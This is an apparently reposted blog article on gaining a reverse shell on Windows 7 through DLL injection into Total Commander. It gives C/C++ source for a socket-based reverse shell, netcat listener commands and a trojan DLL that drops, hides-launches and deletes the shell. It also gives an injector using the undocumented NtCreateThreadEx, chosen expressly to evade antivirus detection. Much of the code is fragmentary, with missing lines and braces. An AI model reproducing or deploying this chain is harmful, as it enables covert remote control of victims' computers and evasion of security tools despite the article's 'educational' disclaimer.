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Reverse shell through DLL Injection using undocumented API function

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[h=3]Reverse shell through DLL Injection using undocumented API function[/h]This article refers to people who already know how to program in c or c++ and have a basic knowledge of windows API calls. In addition some knowledge of exploitation techniques is needed such as what is a reverse shell, how we can use netcat etc... If this is the first time for you to read such things then do not bother to read the article.

DLL Injection is a popular technique used by attackers to inject an executable in order to perform controlled code execution. Serveral methods for preventing this has been developed by OS creators, but w/o 100% success.

In this article I will present two methods of a successful attack to a windows 7 Ultimate OS that returns a reverse shell to the attacker. The first method uses the documented windows API function CreateRemoteThread and the second method uses the undocumented funNtCreateThreadEx. The reason that I prefer the 2nd method is because of the fact that the 1st method trigger an alarm of the windows security essentials antivirus while the 2nd does not!

In addition, a "home made" undetectable reverse shell (developed in c++) will be used in conjuction with a method of transferring or packing an executable inside another executable.

The final attack will be performed using two methods. The traditional (manual) method that I use only Netcat and the... "official" method that I use the well known Armitage of the Metasploit arsenal. Pictures of the attack will be available to you as well as a short video.

Before we start I would like to clarify that this is not a "How to invade" tutorial neither a method of how to install a Trojan to a victim's box. It is exactly what its title states: A method of calling a Reverse shell through DLL Injection using undocumented API in windows 7. Nothing more and nothing less. If you feel immature enough to get this method to harm others' computers then the blame is not mine but in your mind ;) This is for educational purposes only.

The Early Steps

In order to perform such attack we need first to decide which executable program we want to inject. In my example I will inject the Total Commander, the programmers favorite windows manager (and not only!). Injecting Total Commander means that when the user starts this program I will immediately get a shell in my PC (locally or remotely) with the same privileges as the injected program itself. To be specific, the method is like this:

The method

1. Check if 'Total Commander' is running.

2. If it is running inject it, and return a reverse shell to a specific IP while continue running Total Commander.

3. If 'Total Commander' is not running goto 1.

My approach will use three programs:

1. totalcmd.exe (Total Commander): is the program that will trigger the whole attack.

2. myDLL.DLL: Is the DLL that will be used as a trojan horse. It will 'carry' the reverse shell. One of its main responsibilities is when DLL_PROCESS_ATTACH occurs it will unpack the reverse shell to disk and execute it.

3. dllattack08.exe: Is the program that when executed it will remain on memory waiting to perform the above 3 steps of The Method.

[h=2]Step 1: Creating the reverse shell.[/h]I will present here my source code of my reverse shell.

The code is the following:

Reverse shell in win32
(c) by thiseas 2010
Compile with VS 2008 from command line with cl:
C:> cl AJVrs.c
#include <winsock2.h>
#include <stdio.h>

#pragma comment(lib, "Ws2_32.lib") //Inform the linker that the Ws2_32.lib file is needed.

#define DEFAULT_PORT 1234
#define DEFAULT_IP ""

WSADATA wsaData;
SOCKET Winsocket;
struct sockaddr_in Winsocket_Structure;

int main(int argc, char *argv[])
char *IP = DEFAULT_IP;
short port = DEFAULT_PORT;

if (argc == 3){
port = atoi(argv[2]);

WSAStartup(MAKEWORD(2,2), &wsaData);
Winsocket=WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP,NULL, (unsigned int) NULL, (unsigned int) NULL);

return 1;

if(WSAConnect(Winsocket,(SOCKADDR*)&Winsocket_Structure,sizeof(Winsocket_Structure),NULL,NULL,NULL,NULL) == SOCKET_ERROR)
return 1;

// Starting shell by creating a new process with i/o redirection.

// here we make the redirection
theProcess.hStdInput = theProcess.hStdOutput = theProcess.hStdError = (HANDLE)Winsocket;

// fork the new process.
return 1;

return 0;

As you can see the code is self explanatory and I am not going into details on it because this is not a programming tutorial.

The above program can be used as is, instead of netcat or in conjuction with it.


On attacker box run Necat to listen for a connection:

on fedora : nc -l 1234

on other linux dist : nc -v -l -p 1234

on win box : nc -v -l -p 1234

On victim's box, run my reverse shell:

c:> AJVrs.exe <attackerIP> 1234

[h=2]Step 2: Store the executable code of the reverse shell inside a program.[/h]We will keep the executable code inside the DLL (that we are going to use later) in order to be executed when it is needed (I will explain how later). We are actually get the byte code of the shell and put it inside to another program. The problem here is how to get the byte code and put it to another program source. There many methods to do this. I test one that i thouhgt it will worked (and it does worked!). I am almost sure that this method has been used by other ppl, but I did not bother to search for this. The goal is to store the whole executable inside a byte array and then write this byte array to disk. The new file that will be created will be a normal PE executable!

I open my reverse shell executable AJVrs.exe using my favorite ultraEdit editor (which is hex editor too). Select all, Right Click and choose Hex Copy Selected View.

Then, Right Click and Copy. Paste the select code in a new file. Turn to Column Selection (Alt+C) and select all the byte code. Then Right Click and Copy.

I put the selected bytes to a new file and I change them as the following example:



4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00






The above task can be easy if we replace every space " " with "\x". But again we will loose the 1st characters on each line. So it is wise if first we move all the text one position on the right:



4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00


4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00

Just to make one space...

But again, I am not finished. I must put every line in double quotes:

Using the column mode (Alt+C) I can easily enclose each line with " in order to meet my final goal which is:







Ok... that's it. I save this file to disk using the name MyTempByteCode.txt

[h=2]Step 3: Creating the DLL.[/h]Its time to create my DLL now. It is the DLL that will be used as a trojan horse. It will carry the reverse shell inside it. One of its main responsibilities is when DLL_PROCESS_ATTACH occurs it will unpack the reverse shell to disk and execute it.

I created using C++ in Microsoft Visual Studio 2008. The source code is:

#include <windows.h>
// In recerseshell I just put contents of the file MyTempByteCode.txt
char recerseshell[] =
BOOL WINAPI DllMain(HANDLE hinstance, DWORD dwReason, LPVOID lpReserved)
int i, len = sizeof(recerseshell);
FILE *ptr ;
ptr = fopen("\\DLLInjection\\DirtyShell.exe", "wb");
for (i=0; i<len; i++)
fprintf(ptr, "%c",recerseshell[i]);

WinExec("\\DLLInjection\\DirtyShell.exe 6666", SW_HIDE);
WinExec("cmd /c ""del \\DLLInjection\\DirtyShell.exe"" ", SW_HIDE);

Again the source code is self explanatory: When the dll attach process is met, I write the reverse byte code to a file, I execute it (in order to open the reverse shell) and I delete it from the disk in order to hide my tracks.

[h=2]Step 4: Performing the injection.[/h]Now I need a program to handle or better to trigger the above dll. This is my 3nd program dllattack08.exe: It is the program that will perform the actual injection to 'Total Commander' using two methods (as I promised). The documented API and the undocumented API (the stealth one!).

I create the program using C++ VS 2008 (again). The source code is the following:

   #include <windows.h>
#include <TlHelp32.h>
#include <shlwapi.h> // Add Lib: Shlwapi.lib
#include <stdio.h>
typedef NTSTATUS (WINAPI *LPFUN_NtCreateThreadEx)
IN ACCESS_MASK DesiredAccess,
IN LPVOID ObjectAttributes,
IN HANDLE ProcessHandle,
IN LPVOID lpParameter,
IN BOOL CreateSuspended,
IN ULONG StackZeroBits,
IN ULONG SizeOfStackCommit,
IN ULONG SizeOfStackReserve,
OUT LPVOID lpBytesBuffer

//Buffer argument passed to NtCreateThreadEx function
struct NtCreateThreadExBuffer
ULONG Unknown1;
ULONG Unknown2;
PULONG Unknown3;
ULONG Unknown4;
ULONG Unknown5;
ULONG Unknown6;
PULONG Unknown7;
ULONG Unknown8;

HANDLE GetProcessHandle(LPCWSTR szExeName, DWORD *ProcessID)
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0);
if(Process32First(hSnapshot, &Pc)){
if(StrStrI(Pc.szExeFile, szExeName)) {
*ProcessID = Pc.th32ProcessID;
return OpenProcess(PROCESS_ALL_ACCESS, TRUE, Pc.th32ProcessID);
}while(Process32Next(hSnapshot, &Pc));
return NULL;
BOOL DllInject(HANDLE hProcess, LPSTR lpszDllPath)
HMODULE hmKernel = GetModuleHandle(L"Kernel32");//heres the DLL
if(hmKernel == NULL || hProcess == NULL)
return FALSE;
int nPathLen = strlen(lpszDllPath); //MAX_PATH; //
LPVOID lpvMem = VirtualAllocEx(hProcess, NULL, nPathLen, MEM_COMMIT, PAGE_READWRITE);
if (lpvMem == NULL)
return FALSE;

if (!WriteProcessMemory(hProcess, lpvMem, lpszDllPath, nPathLen, NULL))
return FALSE;
DWORD dwWaitResult= 0, dwExitResult = 0;
HANDLE hThread = CreateRemoteThread(hProcess,
(LPTHREAD_START_ROUTINE)GetProcAddress(hmKernel, "LoadLibraryA"),
if(hThread != NULL){
dwWaitResult = WaitForSingleObject(hThread, 10000); // keep the dll injection action for 10 seconds before free.
GetExitCodeThread(hThread, &dwExitResult);
VirtualFreeEx(hProcess, lpvMem, 0, MEM_RELEASE);
return (1);
return (0);

BOOL DllInject_2(HANDLE hProcess, LPSTR lpszDllPath)
HMODULE hmKernel = GetModuleHandle(L"Kernel32");//heres the DLL
if(hmKernel == NULL || hProcess == NULL) return FALSE;
int nPathLen = strlen(lpszDllPath); //MAX_PATH; //
LPVOID lpvMem = VirtualAllocEx(hProcess, NULL, nPathLen, MEM_COMMIT, PAGE_READWRITE);
WriteProcessMemory(hProcess, lpvMem, lpszDllPath, nPathLen, NULL);
DWORD dwWaitResult, dwExitResult = 0;
HMODULE modNtDll = GetModuleHandle(L"ntdll.dll");
if( !modNtDll )
//printf("\n failed to get module handle for ntdll.dll, Error=0x%.8x", GetLastError());
return 0;
LPFUN_NtCreateThreadEx funNtCreateThreadEx =
(LPFUN_NtCreateThreadEx) GetProcAddress(modNtDll, "NtCreateThreadEx");
if( !funNtCreateThreadEx )
//printf("\n failed to get funtion address from ntdll.dll, Error=0x%.8x", GetLastError());
return 0;
NtCreateThreadExBuffer ntbuffer;
memset (&ntbuffer,0,sizeof(NtCreateThreadExBuffer));
DWORD temp1 = 0;
DWORD temp2 = 0;
ntbuffer.Size = sizeof(NtCreateThreadExBuffer);
ntbuffer.Unknown1 = 0x10003;
ntbuffer.Unknown2 = 0x8;
ntbuffer.Unknown3 = 0;//&temp2;
ntbuffer.Unknown4 = 0;
ntbuffer.Unknown5 = 0x10004;
ntbuffer.Unknown6 = 4;
ntbuffer.Unknown7 = &temp1;
ntbuffer.Unknown8 = 0;
HANDLE hThread;
NTSTATUS status = funNtCreateThreadEx(
(LPTHREAD_START_ROUTINE)GetProcAddress(hmKernel, "LoadLibraryA"),
FALSE, //start instantly
if(hThread != NULL){
// keep the dll injection action for 10 seconds before free.
dwWaitResult = WaitForSingleObject(hThread, 10000);
GetExitCodeThread(hThread, &dwExitResult);
VirtualFreeEx(hProcess, lpvMem, 0, MEM_RELEASE);
return (1);
return (0);
int ActivateSeDebugPrivilege(void){
HANDLE hToken;
if (!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &Val))
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = Val;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof (tp), NULL, NULL))
return 1;
int main(int argc, char *argv[])
DWORD CurrentSessionID, RemoteSessionID, RemoteProcessID;
LPCWSTR lpVictimProcess = TEXT("totalcmd.exe");
char *cpVictimProcess = "totalcmd.exe";
printf("DLL Injection.\n");
if ( ActivateSeDebugPrivilege() == 1)
printf("Get All Privilege.\n");
printf("Cannot Get All Privilege.\n");

printf("Waiting for process %s...",cpVictimProcess);
HANDLE hProcess;
hProcess = GetProcessHandle(lpVictimProcess, &RemoteProcessID);
}while(hProcess == NULL);
printf("\nFound! Try to inject...");
// Get the session ID of the remote process.
//DWORD RemoteSessionID = ProcessIdToSessionId( hProcess );

if (!ProcessIdToSessionId( GetCurrentProcessId(), &CurrentSessionID ))
printf("\nFailed to get the current session with error %d", GetLastError());
if (!ProcessIdToSessionId( RemoteProcessID, &RemoteSessionID ))
printf("\nFailed to get the remote session with error %d", GetLastError());
if (DllInject(hProcess, "\\DLLInjection\\myDLL.dll"))
return 0;

I suppose that some things need clarification here:

The function that perform the actuall DLL injection using the documented API CreateRemoteThread is:

DllInject(hProcess, "\\DLLInjection\\myDLL.dll")

The function takes 2 arguments: The process handle of the program that is going to be injected and the actual DLL flename that will be attached to the injected executable. As you can see this is "open" enough to accept anything you like... ;)

Another interesting topic is the use of the SeDebugPrivilege function as an effort to obtain as many priviledges as possible. Microsoft states that:

"By setting the SeDebugPrivilege privilege on the running process, you can obtain the process handle of any running application. When obtaining the handle to a process, you can then specify the PROCESS_ALL_ACCESS flag, which will allow the calling of various Win32 APIs upon that process handle, which you normally could not do." ( http://support.microsoft.com/kb/185215 )

This is interesting indeed, huh? ;)

To be honest, I suppose that the above is not 100% true for windows 7, but you never know. It was worth a try... anyway.

An important drawback of this method is that it triggers the Microsoft Security Essentials Antivirus. I found that the cause of the alarm is the use of the API CreateRemoteThread inside the DllInject function. So, I replace this function with a new but... undocumented one! To explain how we find and analyse undocumented Windows API functions is another (indeed challenging) story that I 'll explain in another article. The documented API is impleneted in the DllInject_2 function. The only change to the code in order to call this API is to replace the 7th line from the bottom of the above source code:


if (DllInject(hProcess, "\\DLLInjection\\myDLL.dll"))


if (DllInject_2(hProcess, "\\DLLInjection\\myDLL.dll"))

and that’s it. You become stealth!

[h=2]Attack using the manual way[/h]Below is an example of the attack using the manual (traditional) way:


Attack using Metasploit Armitage

Metasploit [http://www.metasploit.com/] is a professional tool for pen testers and not only. Armitage [http://www.fastandeasyhacking.com/] is a front-end (i can say) for metasploit. This tool can be use to perform the same attack. It can be used as client to listen to the port 6666 in order get my reverse shell. Take a look here:




One of the interesting thing here is that any reverse shell can be used. You can (for example) create an encrypted one using metasploit, get its binary code, put it in my DLL and perform the attack. The method and the code is open enough to support such techniques.

[h=2]Sample Videos of attacks[/h]

[1]. Case I: Total Commander is already open http://rapidshare.com/files/454308917/Dll-Inject-Attack-Video.rar [2]. Case II: Total Commander is opened after the injection https://rapidshare.com/files/3697690472/Dll-Inject-Attack_II.rar

Posted by Andreas Venieris at 10:08 PM

Sursa: 0x191 Unauthorized: Reverse shell through DLL Injection using undocumented API function

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